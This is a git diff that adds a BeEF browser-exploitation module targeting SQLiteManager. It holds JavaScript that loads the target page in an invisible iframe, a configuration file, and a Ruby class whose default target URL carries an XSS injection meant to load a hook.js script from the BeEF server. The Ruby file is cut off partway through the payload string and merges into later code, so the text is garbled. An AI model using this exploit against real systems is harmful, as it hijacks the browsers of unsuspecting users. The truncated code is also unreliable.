diff --git a/modules/exploits/sqlitemanager_xss/command.js b/modules/exploits/sqlitemanager_xss/command.js
new file mode 100644
index 000000000..c919b9bb6
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+
+ var serendipity_iframe = beef.dom.createInvisibleIframe();
+ serendipity_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
diff --git a/modules/exploits/sqlitemanager_xss/config.yaml b/modules/exploits/sqlitemanager_xss/config.yaml
new file mode 100644
index 000000000..c1cb0a5a8
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ sqlitemanager_xss:
+ enable: true
+ category: ["Exploits", "XSS"]
+ name: "SQLiteManager XSS"
+ description: "Attempts to hook SQLiteManager using XSS.
Tested on version 1.2.4 however other versions are likely to be vulnerable."
+ authors: ["bcoles"]
+ target:
+ unknown: ["ALL"]
diff --git a/modules/exploits/sqlitemanager_xss/module.rb b/modules/exploits/sqlitemanager_xss/module.rb
new file mode 100644
index 000000000..970693e67
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/module.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Sqlitemanager_xss < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+ hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+ return [
+ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1">
@datastore['result']}) + end + +end